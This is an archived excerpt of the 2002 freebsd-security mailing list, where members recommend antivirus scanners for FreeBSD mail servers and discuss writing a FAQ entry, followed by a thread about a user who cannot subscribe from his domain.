List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > i can't find any licensing information past that > '30 day' period :( Hello Marc, Send an email to Daniel . He worked with me over the phone to determine which product numbers to order. Let him know what you intend to do with it. My gut feeling is that he is a Canadian rep (our company being Canadian), but perhaps he can direct you. These are the numbers that we came up with: NSEABE-AA-A Scanner NSEYBM-AA-A One year free updates Derek To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 9:49:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 05D9037B400 for ; Wed, 4 Sep 2002 09:49:08 -0700 (PDT) Received: from osi-east2.nersc.gov (osi-east2.nersc.gov [128.55.6.20]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4D9D243E4A for ; Wed, 4 Sep 2002 09:49:07 -0700 (PDT) (envelope-from dart@nersc.gov) Received: from gemini.nersc.gov (gemini.nersc.gov [128.55.16.111]) by osi-east2.nersc.gov (8.9.2/8.9.2) with ESMTP id JAA13659 for ; Wed, 4 Sep 2002 09:49:06 -0700 (PDT) Received: from gemini.nersc.gov (localhost [127.0.0.1]) by gemini.nersc.gov (Postfix) with ESMTP id D786A3B1AE for ; Wed, 4 Sep 2002 09:49:05 -0700 (PDT) X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 To: freebsd-security@FreeBSD.ORG Subject: Re: Anti virus software for FreeBSD ... In-Reply-To: Your message of Wed, 04 Sep 2002 10:24:10 EDT. <03b801c2541e$bc74f9d0$04fea8c0@motorcity.on.ca> Mime-Version: 1.0 Content-Type: multipart/signed; boundary="==_Exmh_-491912335P"; micalg=pgp-sha1; protocol="application/pgp-signature" Content-Transfer-Encoding: 7bit Date: Wed, 04 Sep 2002 09:49:05 -0700 From: Eli Dart Message-Id: <20020904164905.D786A3B1AE@gemini.nersc.gov> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --==_Exmh_-491912335P Content-Type: text/plain; charset=us-ascii This question comes up in this forum every couple of months.... Is anyone interested in writing a FAQ entry about this? It looks like there are several people in this discussion with the experience to do it.... --eli In reply to "Derek" : > > i can't find any licensing information past that > > '30 day' period :( > > Hello Marc, > Send an email to Daniel . He worked with > me over the phone to determine which product numbers to order. > Let him know what you intend to do with it. My gut feeling is > that he is a Canadian rep (our company being Canadian), but > perhaps he can direct you. These are the numbers that we came up > with: > > NSEABE-AA-A Scanner > NSEYBM-AA-A One year free updates > > Derek > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message --==_Exmh_-491912335P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: This is a comment. iD8DBQE9djmBLTFEeF+CsrMRArHFAJ9QlkFQTqotByy6XsaULU2451zj0gCfUcYb vvt121CmCpeCveuPWz0Zf18= =GoBw -----END PGP SIGNATURE----- --==_Exmh_-491912335P-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 9:59: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9E1EF37B400 for ; Wed, 4 Sep 2002 09:59:03 -0700 (PDT) Received: from mail.geek.sh (decoder.geek.sh [196.36.198.81]) by mx1.FreeBSD.org (Postfix) with ESMTP id 65E5D43E3B for ; Wed, 4 Sep 2002 09:59:01 -0700 (PDT) (envelope-from aragon@geek.sh) Received: by mail.geek.sh (Postfix, from userid 1000) id 38E6324EF9; Wed, 4 Sep 2002 18:58:54 +0200 (SAST) Date: Wed, 4 Sep 2002 18:58:54 +0200 From: Aragon Gouveia To: "Marc G. Fournier" Cc: freebsd-security@freebsd.org Subject: Re: Anti virus software for FreeBSD ... Message-ID: <20020904165854.GA50174@phat.za.net> Mail-Followup-To: "Marc G. Fournier" , freebsd-security@freebsd.org References: <20020904014942.F25799-100000@hub.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020904014942.F25799-100000@hub.org> User-Agent: Mutt/1.4i X-Operating-System: FreeBSD 4.6-RC i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org There's also McAfee - /usr/ports/security/vscan Regards, Aragon | By Marc G. Fournier | [ 2002-09-04 06:54 +0200 ] > > Seems quite limited ... I'm looking for one to run with amavisd on a mail > server, but the only one I can seem to find is vscan, and for that, i > can't find any licensing information past that '30 day' period :( > > I've looked at the openantivirus.org site ... but nothing there is jumping > out at me, and their virus definitions look a bit old? > > anyone? > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 10:12: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7997837B400 for ; Wed, 4 Sep 2002 10:11:57 -0700 (PDT) Received: from smtp.comcast.net (smtp.comcast.net [24.153.64.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 24FA143E3B for ; Wed, 4 Sep 2002 10:11:57 -0700 (PDT) (envelope-from lomifeh@earthlink.net) Received: from [68.39.202.147] (bgp586692bgs.jdover01.nj.comcast.net [68.39.202.147]) by mtaout03.icomcast.net (iPlanet Messaging Server 5.1 HotFix 0.8 (built May 13 2002)) with ESMTP id <0H1X00H0QBRWV2@mtaout03.icomcast.net> for freebsd-security@freebsd.org; Wed, 04 Sep 2002 13:11:56 -0400 (EDT) Date: Wed, 04 Sep 2002 13:11:55 -0400 From: Lawrence Sica Subject: Re: Anti virus software for FreeBSD ... In-reply-to: <20020904014942.F25799-100000@hub.org> To: "Marc G. Fournier" , freebsd-security Message-id: MIME-version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT User-Agent: Microsoft-Entourage/10.1.0.2006 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 09/04/02 12:51 AM, "Marc G. Fournier" wrote: > > Seems quite limited ... I'm looking for one to run with amavisd on a mail > server, but the only one I can seem to find is vscan, and for that, i > can't find any licensing information past that '30 day' period :( > I'd be careful with amavis, I've always had scaling issues with it. I haven't found anything server-wise I really like for that. You need to talk to mcafee about vscan licensing. I used vscan at one place and it worked well, caught every virus that was thrown at it. And it's dat updates allowed for a simple crontab on it. --Larry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 10:13:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E0F5D37B400 for ; Wed, 4 Sep 2002 10:13:33 -0700 (PDT) Received: from smtp.comcast.net (smtp.comcast.net [24.153.64.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8F6BF43E3B for ; Wed, 4 Sep 2002 10:13:33 -0700 (PDT) (envelope-from lomifeh@earthlink.net) Received: from [68.39.202.147] (bgp586692bgs.jdover01.nj.comcast.net [68.39.202.147]) by mtaout02.icomcast.net (iPlanet Messaging Server 5.1 HotFix 0.8 (built May 13 2002)) with ESMTP id <0H1X002TEBUKIO@mtaout02.icomcast.net> for freebsd-security@freebsd.org; Wed, 04 Sep 2002 13:13:32 -0400 (EDT) Date: Wed, 04 Sep 2002 13:13:31 -0400 From: Lawrence Sica Subject: Re: Anti virus software for FreeBSD ... In-reply-to: <20020904164905.D786A3B1AE@gemini.nersc.gov> To: Eli Dart , freebsd-security Message-id: MIME-version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT User-Agent: Microsoft-Entourage/10.1.0.2006 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 09/04/02 12:49 PM, "Eli Dart" wrote: > > This question comes up in this forum every couple of months.... > > Is anyone interested in writing a FAQ entry about this? It looks > like there are several people in this discussion with the experience > to do it.... > > I'm up for it, I can dig out my old article for the freebsdzine that I wrote about a year ago, it would need updating but I'd be up for it. > --eli > > > In reply to "Derek" : > >>> i can't find any licensing information past that >>> '30 day' period :( >> >> Hello Marc, >> Send an email to Daniel . He worked with >> me over the phone to determine which product numbers to order. >> Let him know what you intend to do with it. My gut feeling is >> that he is a Canadian rep (our company being Canadian), but >> perhaps he can direct you. These are the numbers that we came up >> with: >> >> NSEABE-AA-A Scanner >> NSEYBM-AA-A One year free updates >> >> Derek >> >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-security" in the body of the message > > > --------------------------------- lomifeh@earthlink.net lomifeh@hotmail.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 10:24: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3C63737B400 for ; Wed, 4 Sep 2002 10:23:58 -0700 (PDT) Received: from mail1.qc.uunet.ca (mail1.qc.uunet.ca [198.168.54.16]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7D7DA43E42 for ; Wed, 4 Sep 2002 10:23:57 -0700 (PDT) (envelope-from anarcat@anarcat.ath.cx) Received: from xtanbul (IDENT:506@[216.94.147.34]) by mail1.qc.uunet.ca (8.10.2/8.10.2) with ESMTP id g84HNpZ18519; Wed, 4 Sep 2002 13:23:52 -0400 Date: Wed, 4 Sep 2002 13:23:53 -0400 Subject: Re: Anti virus software for FreeBSD ... Content-Type: text/plain; charset=US-ASCII; format=flowed Mime-Version: 1.0 (Apple Message framework v482) Cc: Eli Dart , freebsd-security To: Lawrence Sica From: Antoine Beaupre In-Reply-To: Message-Id: <15776D82-C02B-11D6-9B5E-0050E4A0BB3F@anarcat.ath.cx> Content-Transfer-Encoding: 7bit X-Mailer: Apple Mail (2.482) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wednesday, September 4, 2002, at 01:13 PM, Lawrence Sica wrote: > On 09/04/02 12:49 PM, "Eli Dart" wrote: > >> >> This question comes up in this forum every couple of months.... >> >> Is anyone interested in writing a FAQ entry about this? It looks >> like there are several people in this discussion with the experience >> to do it.... >> >> > I'm up for it, I can dig out my old article for the freebsdzine that I > wrote > about a year ago, it would need updating but I'd be up for it. Please, please, please do! :) Just submit a PR as a patch to the faq doc or something. A. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 10:31:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 20A7C37B406 for ; Wed, 4 Sep 2002 10:31:38 -0700 (PDT) Received: from mgw1-out.MEIway.com (mgw1.meiway.com [212.73.210.75]) by mx1.FreeBSD.org (Postfix) with ESMTP id 422B943E42 for ; Wed, 4 Sep 2002 10:31:37 -0700 (PDT) (envelope-from LConrad@Go2France.com) Received: from VirusGate.MEIway.com (virus-gate.meiway.com [212.73.210.91]) by mgw1-out.MEIway.com (Postfix Relay Hub) with ESMTP id 73BEFEF6A5 for ; Wed, 4 Sep 2002 19:19:50 +0200 (CEST) Received: from localhost (localhost.meiway.com [127.0.0.1]) by VirusGate.MEIway.com (Postfix) with SMTP id 098825D009 for ; Wed, 4 Sep 2002 19:36:43 +0200 (CEST) Received: from mail.Go2France.com (ms1.meiway.com [212.73.210.73]) by VirusGate.MEIway.com (Postfix) with ESMTP id 9B72E5D008 for ; Wed, 4 Sep 2002 19:36:42 +0200 (CEST) Received: from LenConrad.Go2France.com [66.64.14.18] by mail.Go2France.com with ESMTP (SMTPD32-6.06) id A4D33AB202A6; Wed, 04 Sep 2002 19:37:23 +0200 Message-Id: <5.1.0.14.2.20020904122900.01be1cf0@mail.Go2France.com> X-Sender: LConrad@Go2France.com@mail.Go2France.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Wed, 04 Sep 2002 12:31:31 -0500 To: freebsd-security@freebsd.org From: Len Conrad Subject: Re: Anti virus software for FreeBSD ... In-Reply-To: References: <20020904014942.F25799-100000@hub.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >I'd be careful with amavis, I've always had scaling issues with it. I >haven't found anything server-wise I really like for that. I installed "Kaspersky AV Daemon for FreeBSD" on postfix for an ISP several months ago. He puts about 150K msgs through the box everyday with no problems. Len ____________________________________________________________________ www.menandmice.com/DNS-training : DNS Training BIND8NT.MEIway.com: Secure config ; DNS and mail interactions IMGate.MEIway.com : Free, proven config for anti-mail-abuse gateways To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 10:54:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D1A1F37B400 for ; Wed, 4 Sep 2002 10:54:46 -0700 (PDT) Received: from aristotle.tamu.edu (Aristotle.tamu.edu [165.91.161.90]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5DE7743E6A for ; Wed, 4 Sep 2002 10:54:46 -0700 (PDT) (envelope-from rasmith@aristotle.tamu.edu) Received: from aristotle.tamu.edu (localhost [127.0.0.1]) by aristotle.tamu.edu (8.12.5/8.12.5) with ESMTP id g84HsjA4092853 for ; Wed, 4 Sep 2002 12:54:45 -0500 (CDT) (envelope-from rasmith@aristotle.tamu.edu) Message-Id: <200209041754.g84HsjA4092853@aristotle.tamu.edu> To: freebsd-security Subject: Re: Anti virus software for FreeBSD ... In-Reply-To: Message from Lawrence Sica of "Wed, 04 Sep 2002 13:11:55 EDT." Mime-Version: 1.0 (generated by tm-edit 7.106) Content-Type: text/plain; charset=US-ASCII Date: Wed, 04 Sep 2002 12:54:45 -0500 From: Robin Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>>>> "Lawrence" == Lawrence Sica writes: Lawrence> I'd be careful with amavis, I've always had scaling Lawrence> issues with it. I haven't found anything server-wise I Lawrence> really like for that. You need to talk to mcafee about Lawrence> vscan licensing. I used vscan at one place and it Lawrence> worked well, caught every virus that was thrown at it. Lawrence> And it's dat updates allowed for a simple crontab on it. amavisd (as opposed to amavis) might help with the scaling issue (use with milter). If you want something that doesn't need amavisd's help, H+BEDV's avmailgate (http://www.hbedv.com/produkte/email/lnx_mailgate.htm) might work. Kaspersky (http://www.kaspersky.com/products.html) also has a FreeBSD-native email scanner. I have no data on how either of these holds up to heavy email traffic; reports indicate that Kaspersky's does a more thorough job. Robin Smith To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 11:34:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 67E9937B400 for ; Wed, 4 Sep 2002 11:34:44 -0700 (PDT) Received: from mail.relinetworks.com (tiamat.relinetworks.com [204.214.92.162]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9630C43E65 for ; Wed, 4 Sep 2002 11:34:43 -0700 (PDT) (envelope-from rob@relinetworks.com) Received: from mail.relinetworks.com (rob@localhost [127.0.0.1]) by mail.relinetworks.com (8.12.6/8.12.6) with ESMTP id g84IYQHS020862 for ; Wed, 4 Sep 2002 14:34:29 -0400 (EDT) Received: (from rob@localhost) by mail.relinetworks.com (8.12.6/8.12.2/Submit) id g84IYQwW020861 for freebsd-security@FreeBSD.ORG; Wed, 4 Sep 2002 14:34:26 -0400 (EDT) Date: Wed, 4 Sep 2002 14:34:25 -0400 From: Rob Andrews To: freebsd-security@FreeBSD.ORG Subject: Re: Anti virus software for FreeBSD ... Message-ID: <20020904143425.A15276@enigma.deathwish.net> References: <20020904014942.F25799-100000@hub.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020904014942.F25799-100000@hub.org>; from scrappy@hub.org on Wed, Sep 04, 2002 at 01:51:34AM -0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Is this discussion really appropriate here? -questions or -chat would be the correct place for this topic I believe. Maybe a browse over the recent post about topics for this list is in order.. Rob Andrews President & Co-Founder RELI Networks, Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 11:49: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0CAD537B400 for ; Wed, 4 Sep 2002 11:49:00 -0700 (PDT) Received: from evil-bofh.visp.net (evil-bofh.visp.net [208.8.184.19]) by mx1.FreeBSD.org (Postfix) with ESMTP id 24E4F43E65 for ; Wed, 4 Sep 2002 11:48:59 -0700 (PDT) (envelope-from kgasso@evil-bofh.visp.net) Received: from localhost (localhost [[UNIX: localhost]]) by evil-bofh.visp.net (8.11.6/8.11.6) id g84Imjl23936; Wed, 4 Sep 2002 14:48:45 -0400 Content-Type: text/plain; charset="iso-8859-1" From: Kameron Gasso Reply-To: kgasso@blort.org To: Rob Andrews Subject: Re: Anti virus software for FreeBSD ... Date: Wed, 4 Sep 2002 14:48:45 -0400 X-Mailer: KMail [version 1.4] References: <20020904014942.F25799-100000@hub.org> <20020904143425.A15276@enigma.deathwish.net> In-Reply-To: <20020904143425.A15276@enigma.deathwish.net> Cc: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200209041448.45420.kgasso@blort.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wednesday 04 September 2002 02:34 pm, Rob Andrews wrote: > Is this discussion really appropriate here? > > -questions or -chat would be the correct place for > this topic I believe. > > Maybe a browse over the recent post about topics for > this list is in order.. > > Rob Andrews > President & Co-Founder > RELI Networks, Inc. Although the links provided would be useful for compilation into a FAQ... -- Kameron Gasso PGP key at http://blort.org/~kgasso/pgpkey.txt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 5 5:44:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5534637B400 for ; Thu, 5 Sep 2002 05:44:30 -0700 (PDT) Received: from blackhelicopters.org (geburah.blackhelicopters.org [209.69.178.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id AC72243E3B for ; Thu, 5 Sep 2002 05:44:29 -0700 (PDT) (envelope-from mwlucas@blackhelicopters.org) Received: from blackhelicopters.org (mwlucas@localhost [127.0.0.1]) by blackhelicopters.org (8.12.5/8.12.5) with ESMTP id g85ChYRI014530; Thu, 5 Sep 2002 08:43:34 -0400 (EDT) (envelope-from mwlucas@blackhelicopters.org) Received: (from mwlucas@localhost) by blackhelicopters.org (8.12.5/8.12.5/Submit) id g85ChWXb014529; Thu, 5 Sep 2002 08:43:33 -0400 (EDT) Date: Thu, 5 Sep 2002 08:43:32 -0400 From: Michael Lucas To: Antoine Beaupre Cc: Lawrence Sica , Eli Dart , freebsd-security Subject: Re: Anti virus software for FreeBSD ... Message-ID: <20020905084332.A14387@blackhelicopters.org> References: <15776D82-C02B-11D6-9B5E-0050E4A0BB3F@anarcat.ath.cx> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <15776D82-C02B-11D6-9B5E-0050E4A0BB3F@anarcat.ath.cx>; from anarcat@anarcat.ath.cx on Wed, Sep 04, 2002 at 01:23:53PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Sep 04, 2002 at 01:23:53PM -0400, Antoine Beaupre wrote: > On Wednesday, September 4, 2002, at 01:13 PM, Lawrence Sica wrote: > > On 09/04/02 12:49 PM, "Eli Dart" wrote: > >> Is anyone interested in writing a FAQ entry about this? It looks > >> like there are several people in this discussion with the experience > >> to do it.... > >> > > I'm up for it, I can dig out my old article for the freebsdzine that I > > wrote > > about a year ago, it would need updating but I'd be up for it. > > Please, please, please do! :) > > Just submit a PR as a patch to the faq doc or something. First of all, let me encourage you to do this in the strongest possible terms. Second, a word on the FAQ: We're trying very hard to rip all tutorials out of the FAQ and decrease its size. If you have a brief bit on antivirus, i.e., "look here, and here, and here," that's perfect FAQ material. If you want to take an old tutorial and rewrite it for the docproj, we'll take that too. But it should go in the Handbook instead. Just FYI; don't want you to have to redo any work. :-) ==ml -- Michael Lucas mwlucas@FreeBSD.org, mwlucas@BlackHelicopters.org http://www.oreillynet.com/pub/q/Big_Scary_Daemons Absolute BSD: http://www.AbsoluteBSD.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 5 21:15:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9856D37B400 for ; Thu, 5 Sep 2002 21:15:16 -0700 (PDT) Received: from tagish.taiga.ca (tagish.taiga.ca [204.209.164.130]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1CAF643E65 for ; Thu, 5 Sep 2002 21:15:16 -0700 (PDT) (envelope-from campbell@tagish.taiga.ca) Received: (from campbell@localhost) by tagish.taiga.ca (8.9.3/8.9.1) id WAA17293 for freebsd-security@FreeBSD.ORG; Thu, 5 Sep 2002 22:14:18 -0600 Date: Thu, 5 Sep 2002 22:14:18 -0600 From: Duncan Campbell Message-Id: <200209060414.WAA17293@tagish.taiga.ca> To: freebsd-security@FreeBSD.ORG Subject: Very peculiar mail-list behaviour Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Gentlemen (&Ladies); A very peculiar thing is happening with regards to this list and other freebsd mail lists: I am unable to sign up from any mail account originating from my domain, neotext.ca. Is this some new, unwritten, policy, or just a bug? Inquiring minds wish to know... Duncan (Dhu) Campbell To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 5 21:23:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6389937B407 for ; Thu, 5 Sep 2002 21:23:09 -0700 (PDT) Received: from fed1mtao03.cox.net (fed1mtao03.cox.net [68.6.19.242]) by mx1.FreeBSD.org (Postfix) with ESMTP id A91E343E4A for ; Thu, 5 Sep 2002 21:23:08 -0700 (PDT) (envelope-from dylan@ocnetworking.com) Received: from ocnetworking.com ([68.4.231.87]) by fed1mtao03.cox.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with ESMTP id <20020906042307.JLTL7696.fed1mtao03.cox.net@ocnetworking.com>; Fri, 6 Sep 2002 00:23:07 -0400 Message-ID: <3D782DF6.D042B93@ocnetworking.com> Date: Thu, 05 Sep 2002 21:24:22 -0700 From: Dylan Reinhold Organization: InterNetworking http://www.ocnetworking.com X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Duncan Campbell Cc: freebsd-security@FreeBSD.ORG Subject: Re: Very peculiar mail-list behaviour References: <200209060414.WAA17293@tagish.taiga.ca> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I think it a DNS problem... ---------------- /home/me $ nslookup neotext.ca Server: ns1.oc.cox.net Address: 68.4.16.30 *** ns1.oc.cox.net can't find neotext.ca: Non-existent host/domain --------------- Dylan Duncan Campbell wrote: > Gentlemen (&Ladies); > > A very peculiar thing is happening with regards to this > list and other freebsd mail lists: I am unable to sign > up from any mail account originating from my domain, > neotext.ca. > > Is this some new, unwritten, policy, or just a bug? > > Inquiring minds wish to know... > > Duncan (Dhu) Campbell > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 5 21:35:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6F62037B400 for ; Thu, 5 Sep 2002 21:35:45 -0700 (PDT) Received: from fed1mtao01.cox.net (fed1mtao01.cox.net [68.6.19.244]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0643243E3B for ; Thu, 5 Sep 2002 21:35:45 -0700 (PDT) (envelope-from dylan@ocnetworking.com) Received: from ocnetworking.com ([68.4.231.87]) by fed1mtao01.cox.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with ESMTP id <20020906043545.BDGR1360.fed1mtao01.cox.net@ocnetworking.com>; Fri, 6 Sep 2002 00:35:45 -0400 Message-ID: <3D7830EB.2067B03A@ocnetworking.com> Date: Thu, 05 Sep 2002 21:36:59 -0700 From: Dylan Reinhold Organization: InterNetworking http://www.ocnetworking.com X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Duncan Campbell , freebsd-security@FreeBSD.ORG Subject: Re: Very peculiar mail-list behaviour References: <200209060414.WAA17293@tagish.taiga.ca> <3D782DF6.D042B93@ocnetworking.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Sorry to reply to myself.. But I need to take back my last post.. I found the MX record and it's IP address has a reverse lookup (not the same domain). So i'm not sure what's wrong.. I will go to sleep now... Dylan Dylan Reinhold wrote, "without thinking first" : > I think it a DNS problem... > ---------------- > /home/me $ nslookup neotext.ca > Server: ns1.oc.cox.net > Address: 68.4.16.30 > > *** ns1.oc.cox.net can't find neotext.ca: Non-existent host/domain > --------------- > > Dylan > > Duncan Campbell wrote: > > > Gentlemen (&Ladies); > > > > A very peculiar thing is happening with regards to this > > list and other freebsd mail lists: I am unable to sign > > up from any mail account originating from my domain, > > neotext.ca. > > > > Is this some new, unwritten, policy, or just a bug? > > > > Inquiring minds wish to know... > > > > Duncan (Dhu) Campbell > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 5 21:36:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 08DDA37B400 for ; Thu, 5 Sep 2002 21:36:23 -0700 (PDT) Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9593C43E6A for ; Thu, 5 Sep 2002 21:36:21 -0700 (PDT) (envelope-from marka@drugs.dv.isc.org) Received: from drugs.dv.isc.org (localhost [127.0.0.1]) by drugs.dv.isc.org (8.12.5/8.12.5) with ESMTP id g864aIB5070456; Fri, 6 Sep 2002 14:36:18 +1000 (EST) (envelope-from marka@drugs.dv.isc.org) Message-Id: <200209060436.g864aIB5070456@drugs.dv.isc.org> To: Dylan Reinhold Cc: Duncan 